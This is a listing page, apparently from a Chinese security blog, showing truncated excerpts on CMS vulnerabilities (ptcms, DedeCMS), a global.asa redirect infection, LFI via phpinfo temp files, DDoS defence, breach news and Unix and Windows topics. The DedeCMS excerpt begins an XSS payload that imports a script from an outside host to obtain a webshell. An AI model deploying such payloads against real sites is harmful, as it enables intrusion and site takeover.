ptcms小说小偷程序鸡肋漏洞

看了一下最新的ptcms小说小偷程序 ,发现之前的漏洞已经修补了,那么先看下如何修补这些漏洞的! 看注册文件上次的写入资料 exit(); } include '../data/user.php'; $username=$_POST['username']; //写入资料信息 $str=$password."\n".time()."\n".$_SERVER["REMOTE_ADDR"]; $fil...

- 阅读全文 -

Unix目录结构的来历

Unix(包含Linux)的初学者,常常会很困惑,不明白目录结构的含义何在。 举例来说,根目录下面有一个子目录/bin,用于存放二进制程序。但是,/usr子目录下面还有/usr/bin,以及/usr/local/bin,也用于存放二进制程序;某些系统甚至还有/opt/bin。它们有何区别? 长久以来,我也感到很费解,不明白为什么这样设计。像大多数人一样,我只是根据《Unix文件系统结构标准》(Fi...

- 阅读全文 -

Anonymous黑客入侵色情网站 窃35万用户数据

据国外媒体报道,一名黑客宣称,他已侵入了色情图片提供商Brazzers旗下某个已废弃不用的网站,并已窃取了超过35万名用户的个人信息。 该网站的所有者Manwin Holding SARL公司的通讯主管凯特-米勒(Kate Miller)昨日声称,该公司“目前正在调查这个问题”,他还表示用户个人的信用卡信息并未泄漏。米勒称,这个黑客似乎是通过某个并不活跃的论坛侵入到其他链接网站的。她表示,该公司已...

- 阅读全文 -

详细介绍制作 Windows 7 封装系统!

网上有很多的各种修改版的系统,如当年的xx花园,如x度,xx风等等,作为熟悉电脑的老手们是只使用纯净版系统的,毕竟,网上的修改版系统即使没有病毒木马,也给你塞了一堆你不喜欢的东西。 可是,每次自己重装纯净版系统还是要安装很多自己常用的软件,还要去挨个做下系统配置来适应自己的习惯,自己家的电脑、公司的电脑都可能碰到这个问题,这个时候,我们就可以考虑动手DIY一个专属系统了,是的,这就是要封装。 很多...

- 阅读全文 -

北电的PC网络被黑客入侵数年之久

      据cnbeta 2月15日报道 北电早在2009年年初申请破产保护,本周一美国司法部批准北电出售超过6000种专利,然而值得注意的是,北电曾经在过去几年的时间里遭遇了长时间的黑客入侵,特别是设在中国的电脑网络持续被黑,可能已经让黑客掌管了大量的机密内容。      华尔街日报报道,黑客早在2004年开始就已经对北电至少两个服务器进行间谍软件攻击,然而,公司领导层决定不向外界透露其网络遭...

- 阅读全文 -

解密global.asa导致网站被挂马或转向

最近在查看网站流量统计的时候发现流量有些异常,于是检查网站程序的时候发现程序多出了一个文件。文件名是Global.asa,我的网站使用的是开源的企业建站系统,一开始没注意过这个问题,就在昨天我的网站流量一下子跌倒了低谷,当时我就怀疑是网站程序出现了问题,但是就是找不出毛病来。后来经常访问网站的客户打电话告诉我说:“从百度打开你的网站会自动跳转到某些色情网站上,并且会被360提示有木马病毒。”于是在...

- 阅读全文 -

浅谈Ddos攻击攻击与防御

原文标题有点别扭,尊重原文吧 EMail: jianxin#80sec.com Site: http://www.80sec.com [ 目录] 一 背景 二 应急响应 三 常见ddos攻击及防御 四 根源及反击 五 总结   一 背景   在前几天,我们运营的某网站遭受了一次ddos攻击,我们的网站是一个公益性质的网站,为各个厂商和白帽子之间搭建一个平台以传递安全问题等信息,...

- 阅读全文 -

dedecms xss 通杀所有版本 dede 5.6 dede 5.7 直接获取webshell

DEDECMS由于编辑器过滤不严,将导致恶意脚本运行。可getshell取得权限。为什么说它是0Day呢?能getshell的都算0Day(鸡肋发挥起来也能变凤凰)   目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。下面说说利用方法。条件有2个: 开启注册 开启投稿 注册会员-发表文章投稿,内容如下填写: <style>@im\port'\http://webshe...

- 阅读全文 -

利用phpinfo信息LFI临时文件

还记得之前国外某牛提出的LFI包含临时文件么? 当时确实觉得有些鸡肋,因为临时文件的路径及名字是未知的,虽然临时文件的名字可以利用类似<>*?等通配符(我们暂且称其为通配符)匹配,而同时N个人一起请求的话可能同时生成很多临时文件,因此用通配符也不一定能匹配成,而且临时文件保存的路径也只能靠猜。 我们知道在向服务器上任意php文件post请求上传数据时,都会生成临时文件,以前不知道临时文...

- 阅读全文 -